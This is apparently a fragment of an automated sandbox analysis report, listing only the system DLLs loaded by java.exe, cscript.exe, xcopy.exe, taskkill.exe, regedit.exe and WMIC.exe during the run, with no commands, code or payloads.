Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
